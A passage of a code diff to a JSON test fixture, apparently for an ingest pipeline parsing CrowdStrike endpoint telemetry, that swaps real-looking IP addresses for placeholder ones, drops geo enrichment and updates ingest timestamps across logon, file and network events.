"ecs": { @@ -7913,19 +6926,19 @@ "user.name" ], "hosts": [ - "208.216.134.211", + "67.43.156.13", "srv2" ], "hash": [ "3950066843" ], "ip": [ - "208.216.134.211" + "67.43.156.13" ] }, "event": { - "ingested": "2021-11-22T09:23:55.466038700Z", - "original": "{\"AuthenticationId\":\"317005428\",\"AuthenticationPackage\":\"Negotiate\",\"ConfigBuild\":\"1007.3.0011603.1\",\"ConfigStateHash\":\"3950066843\",\"EffectiveTransmissionClass\":\"2\",\"Entitlements\":\"15\",\"LogoffTime\":\"1604855132.756\",\"LogonDomain\":\"dom1\",\"LogonServer\":\"srv2\",\"LogonTime\":\"1604855131.666\",\"LogonType\":\"7\",\"PasswordLastSet\":\"1598119332.510\",\"RemoteAccount\":\"1\",\"UserFlags\":\"32\",\"UserIsAdmin\":\"0\",\"UserLogoffType\":\"3\",\"UserLogonFlags\":\"0\",\"UserName\":\"user4\",\"UserPrincipal\":\"user.name@dom2.com\",\"UserSid\":\"S-1-5-21-606747145-1364589140-725345543-28636\",\"aid\":\"ffffffffe0104823bd3de859d5bc8bc7\",\"aip\":\"208.216.134.211\",\"cid\":\"ffffffff30a3407dae27d0503611022d\",\"event_platform\":\"Win\",\"event_simpleName\":\"UserLogoff\",\"id\":\"ffffffff-1111-11eb-8913-0287fd11c79b\",\"name\":\"UserLogoffV3\",\"timestamp\":\"1604855134461\"}", + "ingested": "2021-12-09T13:36:11.151143Z", + "original": "{\"AuthenticationId\":\"317005428\",\"AuthenticationPackage\":\"Negotiate\",\"ConfigBuild\":\"1007.3.0011603.1\",\"ConfigStateHash\":\"3950066843\",\"EffectiveTransmissionClass\":\"2\",\"Entitlements\":\"15\",\"LogoffTime\":\"1604855132.756\",\"LogonDomain\":\"dom1\",\"LogonServer\":\"srv2\",\"LogonTime\":\"1604855131.666\",\"LogonType\":\"7\",\"PasswordLastSet\":\"1598119332.510\",\"RemoteAccount\":\"1\",\"UserFlags\":\"32\",\"UserIsAdmin\":\"0\",\"UserLogoffType\":\"3\",\"UserLogonFlags\":\"0\",\"UserName\":\"user4\",\"UserPrincipal\":\"user.name@dom2.com\",\"UserSid\":\"S-1-5-21-606747145-1364589140-725345543-28636\",\"aid\":\"ffffffffe0104823bd3de859d5bc8bc7\",\"aip\":\"67.43.156.13\",\"cid\":\"ffffffff30a3407dae27d0503611022d\",\"event_platform\":\"Win\",\"event_simpleName\":\"UserLogoff\",\"id\":\"ffffffff-1111-11eb-8913-0287fd11c79b\",\"name\":\"UserLogoffV3\",\"timestamp\":\"1604855134461\"}", "created": "2020-11-08T17:05:34.461Z", "kind": "event", "action": "UserLogoff", @@ -7982,21 +6995,12 @@ "preserve_original_event" ], "observer": { - "geo": { - "continent_name": "North America", - "country_name": "United States", - "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" - }, - "address": "208.216.150.192", - "vendor": "crowdstrike", - "ip": "208.216.150.192", "serial_number": "ffffffff425942f58382dbb11350eeda", + "address": "67.43.156.13", "type": "agent", - "version": "1007.3.0011603.1" + "version": "1007.3.0011603.1", + "vendor": "crowdstrike", + "ip": "67.43.156.13" }, "@timestamp": "2020-11-08T17:03:45.966Z", "file": { @@ -8012,18 +7016,18 @@ }, "related": { "hosts": [ - "208.216.150.192" + "67.43.156.13" ], "hash": [ "537307300" ], "ip": [ - "208.216.150.192" + "67.43.156.13" ] }, "event": { - "ingested": "2021-11-22T09:23:55.466045400Z", - "original": "{\"ConfigBuild\":\"1007.3.0011603.1\",\"ConfigStateHash\":\"537307300\",\"ContextProcessId\":\"635780922149\",\"ContextThreadId\":\"9479299143023\",\"ContextTimeStamp\":\"1604855025.966\",\"DesiredAccess\":\"1180054\",\"EffectiveTransmissionClass\":\"3\",\"Entitlements\":\"15\",\"FileAttributes\":\"128\",\"FileIdentifier\":\"0e02a8c7ed9d244887cef0409af0e6190030000000001100\",\"FileObject\":\"18446695174291796544\",\"Information\":\"2\",\"IrpFlags\":\"2180\",\"MajorFunction\":\"0\",\"MinorFunction\":\"0\",\"OperationFlags\":\"0\",\"Options\":\"83886176\",\"ShareAccess\":\"3\",\"Status\":\"0\",\"TargetFileName\":\"\\\\Device\\\\HarddiskVolume4\\\\Program Files\\\\Snow Software\\\\Inventory\\\\Agent\\\\cloudmeteringhost.exe\",\"aid\":\"ffffffff425942f58382dbb11350eeda\",\"aip\":\"208.216.150.192\",\"cid\":\"ffffffff30a3407dae27d0503611022d\",\"event_platform\":\"Win\",\"event_simpleName\":\"NewExecutableWritten\",\"id\":\"ffffffff-1111-11eb-93cb-067deb43537b\",\"name\":\"NewExecutableWrittenV1\",\"timestamp\":\"1604855149643\"}", + "ingested": "2021-12-09T13:36:11.151149300Z", + "original": "{\"ConfigBuild\":\"1007.3.0011603.1\",\"ConfigStateHash\":\"537307300\",\"ContextProcessId\":\"635780922149\",\"ContextThreadId\":\"9479299143023\",\"ContextTimeStamp\":\"1604855025.966\",\"DesiredAccess\":\"1180054\",\"EffectiveTransmissionClass\":\"3\",\"Entitlements\":\"15\",\"FileAttributes\":\"128\",\"FileIdentifier\":\"0e02a8c7ed9d244887cef0409af0e6190030000000001100\",\"FileObject\":\"18446695174291796544\",\"Information\":\"2\",\"IrpFlags\":\"2180\",\"MajorFunction\":\"0\",\"MinorFunction\":\"0\",\"OperationFlags\":\"0\",\"Options\":\"83886176\",\"ShareAccess\":\"3\",\"Status\":\"0\",\"TargetFileName\":\"\\\\Device\\\\HarddiskVolume4\\\\Program Files\\\\Snow Software\\\\Inventory\\\\Agent\\\\cloudmeteringhost.exe\",\"aid\":\"ffffffff425942f58382dbb11350eeda\",\"aip\":\"67.43.156.13\",\"cid\":\"ffffffff30a3407dae27d0503611022d\",\"event_platform\":\"Win\",\"event_simpleName\":\"NewExecutableWritten\",\"id\":\"ffffffff-1111-11eb-93cb-067deb43537b\",\"name\":\"NewExecutableWrittenV1\",\"timestamp\":\"1604855149643\"}", "created": "2020-11-08T17:05:49.643Z", "kind": "event", "action": "NewExecutableWritten", @@ -8087,21 +7091,12 @@ "direction": "unknown" }, "observer": { - "geo": { - "continent_name": "North America", - "country_name": "United States", - "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" - }, - "address": "208.222.216.124", - "vendor": "crowdstrike", - "ip": "208.222.216.124", "serial_number": "ffffffffa51b4acf9dbc1fc273e6145c", + "address": "67.43.156.14", "type": "agent", - "version": "1007.3.0011603.1" + "version": "1007.3.0011603.1", + "vendor": "crowdstrike", + "ip": "67.43.156.14" }, "@timestamp": "2020-11-08T17:05:50.066Z", "ecs": { @@ -8109,7 +7104,7 @@ }, "related": { "hosts": [ - "208.222.216.124", + "67.43.156.14", "127.0.0.1", "0.0.0.0" ], @@ -8117,14 +7112,14 @@ "3765958535" ], "ip": [ - "208.222.216.124", + "67.43.156.14", "127.0.0.1", "0.0.0.0" ] }, "event": { - "ingested": "2021-11-22T09:23:55.466052100Z", - "original": "{\"ConfigBuild\":\"1007.3.0011603.1\",\"ConfigStateHash\":\"3765958535\",\"ConnectionDirection\":\"2\",\"ConnectionFlags\":\"0\",\"ContextProcessId\":\"50714198593318\",\"ContextThreadId\":\"194302491825207\",\"ContextTimeStamp\":\"1604855150.066\",\"EffectiveTransmissionClass\":\"3\",\"Entitlements\":\"15\",\"InContext\":\"0\",\"LocalAddressIP4\":\"127.0.0.1\",\"LocalPort\":\"59491\",\"Protocol\":\"6\",\"RemoteAddressIP4\":\"0.0.0.0\",\"RemotePort\":\"0\",\"aid\":\"ffffffffa51b4acf9dbc1fc273e6145c\",\"aip\":\"208.222.216.124\",\"cid\":\"ffffffff30a3407dae27d0503611022d\",\"event_platform\":\"Win\",\"event_simpleName\":\"NetworkListenIP4\",\"id\":\"ffffffff-1111-11eb-8726-063418e4a9e7\",\"name\":\"NetworkListenIP4V5\",\"timestamp\":\"1604855150545\"}", + "ingested": "2021-12-09T13:36:11.151155600Z", + "original": "{\"ConfigBuild\":\"1007.3.0011603.1\",\"ConfigStateHash\":\"3765958535\",\"ConnectionDirection\":\"2\",\"ConnectionFlags\":\"0\",\"ContextProcessId\":\"50714198593318\",\"ContextThreadId\":\"194302491825207\",\"ContextTimeStamp\":\"1604855150.066\",\"EffectiveTransmissionClass\":\"3\",\"Entitlements\":\"15\",\"InContext\":\"0\",\"LocalAddressIP4\":\"127.0.0.1\",\"LocalPort\":\"59491\",\"Protocol\":\"6\",\"RemoteAddressIP4\":\"0.0.0.0\",\"RemotePort\":\"0\",\"aid\":\"ffffffffa51b4acf9dbc1fc273e6145c\",\"aip\":\"67.43.156.14\",\"cid\":\"ffffffff30a3407dae27d0503611022d\",\"event_platform\":\"Win\",\"event_simpleName\":\"NetworkListenIP4\",\"id\":\"ffffffff-1111-11eb-8726-063418e4a9e7\",\"name\":\"NetworkListenIP4V5\",\"timestamp\":\"1604855150545\"}", "created": "2020-11-08T17:05:50.545Z", "kind": "event", "action": "NetworkListenIP4", @@ -8159,26 +7154,8 @@ "type": "windows" }, "destination": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-IN", - "city_name": "Auburn", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Indiana", - "location": { - "lon": -85.0497, - "lat": 41.3569 - } - }, - "as": { - "number": 14140, - "organization": { - "name": "Auburn Essential Services" - } - }, - "address": "208.80.28.100", - "ip": "208.80.28.100" + "address": "67.43.156.14", + "ip": "67.43.156.14" }, "url": { "scheme": "http" @@ -8187,21 +7164,12 @@ "preserve_original_event" ], "observer": { - "geo": { - "continent_name": "North America", - "country_name": "United States", - "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" - }, - "address": "208.216.128.255", - "vendor": "crowdstrike", - "ip": "208.216.128.255", "serial_number": "ffffffffd8844a59acce5e1f4ad01888", + "address": "67.43.156.13", "type": "agent", - "version": "1007.3.0011603.1" + "version": "1007.3.0011603.1", + "vendor": "crowdstrike", + "ip": "67.43.156.13" }, "@timestamp": "2020-11-08T17:05:52.993Z", "ecs": { @@ -8212,21 +7180,21 @@ "user5" ], "hosts": [ - "208.216.128.255", - "208.80.28.100", + "67.43.156.13", + "67.43.156.14", "com1" ], "hash": [ "3011122681" ], "ip": [ - "208.216.128.255", - "208.80.28.100" + "67.43.156.13", + "67.43.156.14" ] }, "event": { - "ingested": "2021-11-22T09:23:55.466058700Z", - "original": "{\"ClientComputerName\":\"com1\",\"ConfigBuild\":\"1007.3.0011603.1\",\"ConfigStateHash\":\"3011122681\",\"ContextProcessId\":\"7073822473144\",\"ContextThreadId\":\"48689911139327\",\"ContextTimeStamp\":\"1604855152.993\",\"EffectiveTransmissionClass\":\"2\",\"Entitlements\":\"15\",\"EtwRawProcessId\":\"744\",\"EtwRawThreadId\":\"5304\",\"LogonDomain\":\"BROADCAST\",\"LogonType\":\"3\",\"RemoteAddressIP4\":\"208.80.28.100\",\"Status\":\"3221225581\",\"SubStatus\":\"3221225578\",\"UserName\":\"user5\",\"aid\":\"ffffffffd8844a59acce5e1f4ad01888\",\"aip\":\"208.216.128.255\",\"cid\":\"ffffffff30a3407dae27d0503611022d\",\"event_platform\":\"Win\",\"event_simpleName\":\"UserLogonFailed2\",\"id\":\"ffffffff-1111-11eb-a8aa-067029dffccb\",\"name\":\"UserLogonFailed2V2\",\"timestamp\":\"1604855154274\"}", + "ingested": "2021-12-09T13:36:11.151161900Z", + "original": "{\"ClientComputerName\":\"com1\",\"ConfigBuild\":\"1007.3.0011603.1\",\"ConfigStateHash\":\"3011122681\",\"ContextProcessId\":\"7073822473144\",\"ContextThreadId\":\"48689911139327\",\"ContextTimeStamp\":\"1604855152.993\",\"EffectiveTransmissionClass\":\"2\",\"Entitlements\":\"15\",\"EtwRawProcessId\":\"744\",\"EtwRawThreadId\":\"5304\",\"LogonDomain\":\"BROADCAST\",\"LogonType\":\"3\",\"RemoteAddressIP4\":\"67.43.156.14\",\"Status\":\"3221225581\",\"SubStatus\":\"3221225578\",\"UserName\":\"user5\",\"aid\":\"ffffffffd8844a59acce5e1f4ad01888\",\"aip\":\"67.43.156.13\",\"cid\":\"ffffffff30a3407dae27d0503611022d\",\"event_platform\":\"Win\",\"event_simpleName\":\"UserLogonFailed2\",\"id\":\"ffffffff-1111-11eb-a8aa-067029dffccb\",\"name\":\"UserLogonFailed2V2\",\"timestamp\":\"1604855154274\"}", "created": "2020-11-08T17:05:54.274Z", "kind": "event", "action": "UserLogonFailed2", @@ -8273,21 +7241,12 @@ "preserve_original_event" ], "observer": { - "geo": { - "continent_name": "North America", - "country_name": "United States", - "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" - }, - "address": "208.216.150.195", - "vendor": "crowdstrike", - "ip": "208.216.150.195", "serial_number": "ffffffff4a0946365161093453e596d4", + "address": "67.43.156.13", "type": "agent", - "version": "1007.3.0011603.1" + "version": "1007.3.0011603.1", + "vendor": "crowdstrike", + "ip": "67.43.156.13" }, "@timestamp": "2020-11-08T17:05:51.534Z", "file": { @@ -8303,18 +7262,18 @@ }, "related": { "hosts": [ - "208.216.150.195" + "67.43.156.13" ], "hash": [ "3343111420" ], "ip": [ - "208.216.150.195" + "67.43.156.13" ] }, "event": { - "ingested": "2021-11-22T09:23:55.466065400Z", - "original": "{\"ConfigBuild\":\"1007.3.0011603.1\",\"ConfigStateHash\":\"3343111420\",\"ContextProcessId\":\"1838383212125\",\"ContextThreadId\":\"27242382481217\",\"ContextTimeStamp\":\"1604855151.534\",\"EffectiveTransmissionClass\":\"3\",\"Entitlements\":\"15\",\"FileIdentifier\":\"b0754a8f86feffffb0754a8f86feffff09764a8f86feffff\",\"FileObject\":\"18446636884348143072\",\"IrpFlags\":\"1028\",\"MajorFunction\":\"18\",\"MinorFunction\":\"0\",\"OperationFlags\":\"0\",\"TargetFileName\":\"\\\\Device\\\\HarddiskVolume3\\\\Program Files\\\\WindowsApps\\\\Deleted\\\\Microsoft.Getstarted_9.10.32461.0_x64__8wekyb3d8bbweacf6b996-01b3-402c-bd01-a67529f94699\\\\clrcompression.dll\",\"aid\":\"ffffffff4a0946365161093453e596d4\",\"aip\":\"208.216.150.195\",\"cid\":\"ffffffff30a3407dae27d0503611022d\",\"event_platform\":\"Win\",\"event_simpleName\":\"ExecutableDeleted\",\"id\":\"ffffffff-1111-11eb-b23b-064dea059649\",\"name\":\"ExecutableDeletedV3\",\"timestamp\":\"1604855154670\"}", + "ingested": "2021-12-09T13:36:11.151168200Z", + "original": "{\"ConfigBuild\":\"1007.3.0011603.1\",\"ConfigStateHash\":\"3343111420\",\"ContextProcessId\":\"1838383212125\",\"ContextThreadId\":\"27242382481217\",\"ContextTimeStamp\":\"1604855151.534\",\"EffectiveTransmissionClass\":\"3\",\"Entitlements\":\"15\",\"FileIdentifier\":\"b0754a8f86feffffb0754a8f86feffff09764a8f86feffff\",\"FileObject\":\"18446636884348143072\",\"IrpFlags\":\"1028\",\"MajorFunction\":\"18\",\"MinorFunction\":\"0\",\"OperationFlags\":\"0\",\"TargetFileName\":\"\\\\Device\\\\HarddiskVolume3\\\\Program Files\\\\WindowsApps\\\\Deleted\\\\Microsoft.Getstarted_9.10.32461.0_x64__8wekyb3d8bbweacf6b996-01b3-402c-bd01-a67529f94699\\\\clrcompression.dll\",\"aid\":\"ffffffff4a0946365161093453e596d4\",\"aip\":\"67.43.156.13\",\"cid\":\"ffffffff30a3407dae27d0503611022d\",\"event_platform\":\"Win\",\"event_simpleName\":\"ExecutableDeleted\",\"id\":\"ffffffff-1111-11eb-b23b-064dea059649\",\"name\":\"ExecutableDeletedV3\",\"timestamp\":\"1604855154670\"}", "created": "2020-11-08T17:05:54.670Z", "kind": "event", "action": "ExecutableDeleted", @@ -8361,21 +7320,12 @@ "preserve_original_event" ], "observer": { - "geo": { - "continent_name": "North America", - "country_name": "United States", - "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" - }, - "address": "208.173.124.176", - "vendor": "crowdstrike", - "ip": "208.173.124.176", "serial_number": "ffffffffcfe84e8c6a52c4001bd83761", + "address": "67.43.156.13", "type": "agent", - "version": "1007.4.0009202.1" + "version": "1007.4.0009202.1", + "vendor": "crowdstrike", + "ip": "67.43.156.13" }, "@timestamp": "2020-11-08T17:05:35.209Z", "ecs": { @@ -8383,19 +7333,19 @@ }, "related": { "hosts": [ - "208.173.124.176" + "67.43.156.13" ], "hash": [ "295fbc2356e8605e804f95cb6d6f992335e247dbf11767fe8781e2a7f889978a", "230795414" ], "ip": [ - "208.173.124.176" + "67.43.156.13" ] }, "event": { - "ingested": "2021-11-22T09:23:55.466072200Z", - "original": "{\"AsepWrittenCount\":\"0\",\"ConfigBuild\":\"1007.4.0009202.1\",\"ConfigStateHash\":\"230795414\",\"ContextProcessId\":\"318137549555284836\",\"ContextThreadId\":\"0\",\"ContextTimeStamp\":\"1604855135.209\",\"DirectoryCreatedCount\":\"0\",\"DnsRequestCount\":\"0\",\"Entitlements\":\"15\",\"ExecutableDeletedCount\":\"0\",\"FileDeletedCount\":\"0\",\"NetworkBindCount\":\"0\",\"NetworkCapableAsepWriteCount\":\"0\",\"NetworkCloseCount\":\"0\",\"NetworkConnectCount\":\"0\",\"NetworkListenCount\":\"0\",\"NetworkRecvAcceptCount\":\"0\",\"NewExecutableWrittenCount\":\"0\",\"RawProcessId\":\"20195\",\"SHA256HashData\":\"295fbc2356e8605e804f95cb6d6f992335e247dbf11767fe8781e2a7f889978a\",\"SuspectStackCount\":\"0\",\"SuspiciousDnsRequestCount\":\"0\",\"TargetProcessId\":\"318137549555284836\",\"aid\":\"ffffffffcfe84e8c6a52c4001bd83761\",\"aip\":\"208.173.124.176\",\"cid\":\"ffffffff30a3407dae27d0503611022d\",\"event_platform\":\"Mac\",\"event_simpleName\":\"EndOfProcess\",\"id\":\"ffffffff-1111-11eb-ae31-065d76bec0c3\",\"name\":\"EndOfProcessMacV11\",\"timestamp\":\"1604855160047\"}", + "ingested": "2021-12-09T13:36:11.151174600Z", + "original": "{\"AsepWrittenCount\":\"0\",\"ConfigBuild\":\"1007.4.0009202.1\",\"ConfigStateHash\":\"230795414\",\"ContextProcessId\":\"318137549555284836\",\"ContextThreadId\":\"0\",\"ContextTimeStamp\":\"1604855135.209\",\"DirectoryCreatedCount\":\"0\",\"DnsRequestCount\":\"0\",\"Entitlements\":\"15\",\"ExecutableDeletedCount\":\"0\",\"FileDeletedCount\":\"0\",\"NetworkBindCount\":\"0\",\"NetworkCapableAsepWriteCount\":\"0\",\"NetworkCloseCount\":\"0\",\"NetworkConnectCount\":\"0\",\"NetworkListenCount\":\"0\",\"NetworkRecvAcceptCount\":\"0\",\"NewExecutableWrittenCount\":\"0\",\"RawProcessId\":\"20195\",\"SHA256HashData\":\"295fbc2356e8605e804f95cb6d6f992335e247dbf11767fe8781e2a7f889978a\",\"SuspectStackCount\":\"0\",\"SuspiciousDnsRequestCount\":\"0\",\"TargetProcessId\":\"318137549555284836\",\"aid\":\"ffffffffcfe84e8c6a52c4001bd83761\",\"aip\":\"67.43.156.13\",\"cid\":\"ffffffff30a3407dae27d0503611022d\",\"event_platform\":\"Mac\",\"event_simpleName\":\"EndOfProcess\",\"id\":\"ffffffff-1111-11eb-ae31-065d76bec0c3\",\"name\":\"EndOfProcessMacV11\",\"timestamp\":\"1604855160047\"}", "created": "2020-11-08T17:06:00.047Z", "kind": "event", "action": "EndOfProcess", @@ -8448,21 +7398,12 @@ "preserve_original_event" ], "observer": { - "geo": { - "continent_name": "North America", - "country_name": "United States", - "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" - }, - "address": "208.24.76.36", - "vendor": "crowdstrike", - "ip": "208.24.76.36", "serial_number": "ffffffff80984ea8b49d9a53f590c566", + "address": "67.43.156.14", "type": "agent", - "version": "1007.3.0011603.1" + "version": "1007.3.0011603.1", + "vendor": "crowdstrike", + "ip": "67.43.156.14" }, "@timestamp": "2020-11-08T17:06:11.731Z", "ecs": { @@ -8470,18 +7411,18 @@ }, "related": { "hosts": [ - "208.24.76.36" + "67.43.156.14" ], "hash": [ "3338885535" ], "ip": [ - "208.24.76.36" + "67.43.156.14" ] }, "event": { - "ingested": "2021-11-22T09:23:55.466078900Z", - "original": "{\"ApiReturnValue\":\"1\",\"ConfigBuild\":\"1007.3.0011603.1\",\"ConfigStateHash\":\"3338885535\",\"ContextProcessId\":\"683078218537\",\"ContextTimeStamp\":\"1604855171.731\",\"EffectiveTransmissionClass\":\"3\",\"Entitlements\":\"15\",\"EtwRawProcessId\":\"19400\",\"EtwRawThreadId\":\"9384\",\"aid\":\"ffffffff80984ea8b49d9a53f590c566\",\"aip\":\"208.24.76.36\",\"cid\":\"ffffffff30a3407dae27d0503611022d\",\"event_platform\":\"Win\",\"event_simpleName\":\"RegisterRawInputDevicesEtw\",\"id\":\"ffffffff-1111-11eb-a570-0685ba2a382f\",\"name\":\"RegisterRawInputDevicesEtwV1\",\"timestamp\":\"1604855173077\"}", + "ingested": "2021-12-09T13:36:11.151181Z", + "original": "{\"ApiReturnValue\":\"1\",\"ConfigBuild\":\"1007.3.0011603.1\",\"ConfigStateHash\":\"3338885535\",\"ContextProcessId\":\"683078218537\",\"ContextTimeStamp\":\"1604855171.731\",\"EffectiveTransmissionClass\":\"3\",\"Entitlements\":\"15\",\"EtwRawProcessId\":\"19400\",\"EtwRawThreadId\":\"9384\",\"aid\":\"ffffffff80984ea8b49d9a53f590c566\",\"aip\":\"67.43.156.14\",\"cid\":\"ffffffff30a3407dae27d0503611022d\",\"event_platform\":\"Win\",\"event_simpleName\":\"RegisterRawInputDevicesEtw\",\"id\":\"ffffffff-1111-11eb-a570-0685ba2a382f\",\"name\":\"RegisterRawInputDevicesEtwV1\",\"timestamp\":\"1604855173077\"}", "created": "2020-11-08T17:06:13.077Z", "kind": "event", "action": "RegisterRawInputDevicesEtw", @@ -8525,25 +7466,16 @@ "domain": "lfodown01-b.cloudsink.net", "subdomain": "lfodown01-b" }, - "tags": [ - "preserve_original_event" - ], - "observer": { - "geo": { - "continent_name": "North America", - "country_name": "United States", - "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" - }, - "address": "208.64.212.186", - "vendor": "crowdstrike", - "ip": "208.64.212.186", + "tags": [ + "preserve_original_event" + ], + "observer": { "serial_number": "ffffffffffc94c645268f64fc900213f", + "address": "67.43.156.14", "type": "agent", - "version": "1007.3.0011603.1" + "version": "1007.3.0011603.1", + "vendor": "crowdstrike", + "ip": "67.43.156.14" }, "@timestamp": "2020-11-08T17:06:14.018Z", "file": { @@ -8555,18 +7487,18 @@ }, "related": { "hosts": [ - "208.64.212.186" + "67.43.156.14" ], "hash": [ "3338885535" ], "ip": [ - "208.64.212.186" + "67.43.156.14" ] }, "event": { - "ingested": "2021-11-22T09:23:55.466085600Z", - "original": "{\"CompletionEventId\":\"Event_ChannelDataDownloadCompleteV1\",\"ConfigBuild\":\"1007.3.0011603.1\",\"ConfigStateHash\":\"3338885535\",\"DownloadPath\":\"metahash+/cfs/channelfiles/0000000013/b2acba1a30a3407dae27d0503611022d/C-00000013-00000000-00000408.sys\",\"DownloadPort\":\"443\",\"DownloadServer\":\"lfodown01-b.cloudsink.net\",\"EffectiveTransmissionClass\":\"0\",\"Entitlements\":\"15\",\"TargetFileName\":\"C-00000013-00000000-00000408.sys\",\"aid\":\"ffffffffffc94c645268f64fc900213f\",\"aip\":\"208.64.212.186\",\"cid\":\"ffffffff30a3407dae27d0503611022d\",\"event_platform\":\"Win\",\"event_simpleName\":\"LFODownloadConfirmation\",\"id\":\"ffffffff-1111-11eb-8ab5-0643392fc75d\",\"name\":\"LFODownloadConfirmationV1\",\"timestamp\":\"1604855174018\"}", + "ingested": "2021-12-09T13:36:11.151187300Z", + "original": "{\"CompletionEventId\":\"Event_ChannelDataDownloadCompleteV1\",\"ConfigBuild\":\"1007.3.0011603.1\",\"ConfigStateHash\":\"3338885535\",\"DownloadPath\":\"metahash+/cfs/channelfiles/0000000013/b2acba1a30a3407dae27d0503611022d/C-00000013-00000000-00000408.sys\",\"DownloadPort\":\"443\",\"DownloadServer\":\"lfodown01-b.cloudsink.net\",\"EffectiveTransmissionClass\":\"0\",\"Entitlements\":\"15\",\"TargetFileName\":\"C-00000013-00000000-00000408.sys\",\"aid\":\"ffffffffffc94c645268f64fc900213f\",\"aip\":\"67.43.156.14\",\"cid\":\"ffffffff30a3407dae27d0503611022d\",\"event_platform\":\"Win\",\"event_simpleName\":\"LFODownloadConfirmation\",\"id\":\"ffffffff-1111-11eb-8ab5-0643392fc75d\",\"name\":\"LFODownloadConfirmationV1\",\"timestamp\":\"1604855174018\"}", "created": "2020-11-08T17:06:14.018Z", "kind": "event", "action": "LFODownloadConfirmation", @@ -8606,24 +7538,12 @@ "preserve_original_event" ], "observer": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-NY", - "city_name": "Albany", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "New York", - "location": { - "lon": -73.8207, - "lat": 42.7198 - } - }, - "address": "208.105.150.175", - "vendor": "crowdstrike", - "ip": "208.105.150.175", "serial_number": "ffffffff280b41b956a91e816bd9b9b0", + "address": "67.43.156.14", "type": "agent", - "version": "1007.3.0011603.1" + "version": "1007.3.0011603.1", + "vendor": "crowdstrike", + "ip": "67.43.156.14" }, "@timestamp": "2020-11-08T17:05:46.590Z", "file": { @@ -8639,18 +7559,18 @@ }, "related": { "hosts": [ - "208.105.150.175" + "67.43.156.14" ], "hash": [ "1763245019" ], "ip": [ - "208.105.150.175" + "67.43.156.14" ] }, "event": { - "ingested": "2021-11-22T09:23:55.466092400Z", - "original": "{\"ConfigBuild\":\"1007.3.0011603.1\",\"ConfigStateHash\":\"1763245019\",\"ContextProcessId\":\"2071361595421\",\"ContextThreadId\":\"41650430047375\",\"ContextTimeStamp\":\"1604855146.590\",\"EffectiveTransmissionClass\":\"3\",\"Entitlements\":\"15\",\"FileIdentifier\":\"4b0121a43dfc1f4ca54eea679ddbcd4eef2103000000ca00\",\"FileObject\":\"18446622606546437424\",\"IrpFlags\":\"395312\",\"MajorFunction\":\"6\",\"MinorFunction\":\"0\",\"NewFileIdentifier\":\"4b0121a43dfc1f4ca54eea679ddbcd4eef2103000000ca00\",\"OperationFlags\":\"0\",\"SourceFileName\":\"\\\\Device\\\\HarddiskVolume3\\\\Windows\\\\assembly\\\\temp\\\\EKA0UARWWK\\\\Microsoft.WSMan.Management.ni.dll\",\"TargetFileName\":\"\\\\Device\\\\HarddiskVolume3\\\\Windows\\\\assembly\\\\NativeImages_v4.0.30319_64\\\\Microsoft.We0722664#\\\\c2579d00f9849413b8b7948dd00ac863\\\\Microsoft.WSMan.Management.ni.dll\",\"aid\":\"ffffffff280b41b956a91e816bd9b9b0\",\"aip\":\"208.105.150.175\",\"cid\":\"ffffffff30a3407dae27d0503611022d\",\"event_platform\":\"Win\",\"event_simpleName\":\"NewExecutableRenamed\",\"id\":\"ffffffff-1111-11eb-8162-0663305b686f\",\"name\":\"NewExecutableRenamedV6\",\"timestamp\":\"1604855177513\"}", + "ingested": "2021-12-09T13:36:11.151193600Z", + "original": "{\"ConfigBuild\":\"1007.3.0011603.1\",\"ConfigStateHash\":\"1763245019\",\"ContextProcessId\":\"2071361595421\",\"ContextThreadId\":\"41650430047375\",\"ContextTimeStamp\":\"1604855146.590\",\"EffectiveTransmissionClass\":\"3\",\"Entitlements\":\"15\",\"FileIdentifier\":\"4b0121a43dfc1f4ca54eea679ddbcd4eef2103000000ca00\",\"FileObject\":\"18446622606546437424\",\"IrpFlags\":\"395312\",\"MajorFunction\":\"6\",\"MinorFunction\":\"0\",\"NewFileIdentifier\":\"4b0121a43dfc1f4ca54eea679ddbcd4eef2103000000ca00\",\"OperationFlags\":\"0\",\"SourceFileName\":\"\\\\Device\\\\HarddiskVolume3\\\\Windows\\\\assembly\\\\temp\\\\EKA0UARWWK\\\\Microsoft.WSMan.Management.ni.dll\",\"TargetFileName\":\"\\\\Device\\\\HarddiskVolume3\\\\Windows\\\\assembly\\\\NativeImages_v4.0.30319_64\\\\Microsoft.We0722664#\\\\c2579d00f9849413b8b7948dd00ac863\\\\Microsoft.WSMan.Management.ni.dll\",\"aid\":\"ffffffff280b41b956a91e816bd9b9b0\",\"aip\":\"67.43.156.14\",\"cid\":\"ffffffff30a3407dae27d0503611022d\",\"event_platform\":\"Win\",\"event_simpleName\":\"NewExecutableRenamed\",\"id\":\"ffffffff-1111-11eb-8162-0663305b686f\",\"name\":\"NewExecutableRenamedV6\",\"timestamp\":\"1604855177513\"}", "created": "2020-11-08T17:06:17.513Z", "kind": "event", "action": "NewExecutableRenamed", @@ -8695,21 +7615,12 @@ "preserve_original_event" ], "observer": { - "geo": { - "continent_name": "North America", - "country_name": "United States", - "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" - }, - "address": "208.216.128.255", - "vendor": "crowdstrike", - "ip": "208.216.128.255", "serial_number": "ffffffff2c9f4066b0b5f2f00265503c", + "address": "67.43.156.13", "type": "agent", - "version": "1007.3.0011603.1" + "version": "1007.3.0011603.1", + "vendor": "crowdstrike", + "ip": "67.43.156.13" }, "@timestamp": "2020-11-08T17:06:05.213Z", "file": { @@ -8724,18 +7635,18 @@ }, "related": { "hosts": [ - "208.216.128.255" + "67.43.156.13" ], "hash": [ "402097454" ], "ip": [ - "208.216.128.255" + "67.43.156.13" ] }, "event": { - "ingested": "2021-11-22T09:23:55.466099100Z", - "original": 